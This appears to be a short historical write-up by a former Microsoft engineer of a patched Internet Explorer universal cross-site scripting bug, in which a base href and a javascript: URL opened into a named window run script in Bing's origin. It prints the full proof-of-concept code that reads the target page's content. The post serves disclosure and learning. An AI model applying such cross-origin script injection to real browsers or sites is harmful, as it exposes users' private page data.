UXSS: New Window javascript: URI Executes in base href Origin

Setting a <base href> to a target origin and then opening a javascript: URL into a named window that held a page from that origin executed the script in the target’s security context. The base href caused IE to resolve the javascript: protocol’s origin as the base domain rather than the actual page.

<base href="http://www.bing.com/">

<script language="JavaScript">
function main()
{
	win = window.open("search?q=ie", "NEW_WIN");
	window.open("javascript:alert(document.URL);alert(document.body.innerHTML);","NEW_WIN");
}
</script>

The first window.open opened a relative URL (search?q=ie) which, because of the <base href>, resolved to http://www.bing.com/search?q=ie and loaded in NEW_WIN. The second window.open targeted the same NEW_WIN with a javascript: URL. IE resolved the javascript: protocol’s origin against the base href — bing.com — and allowed it to execute in that window’s context, exposing document.body.innerHTML from Bing’s page.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.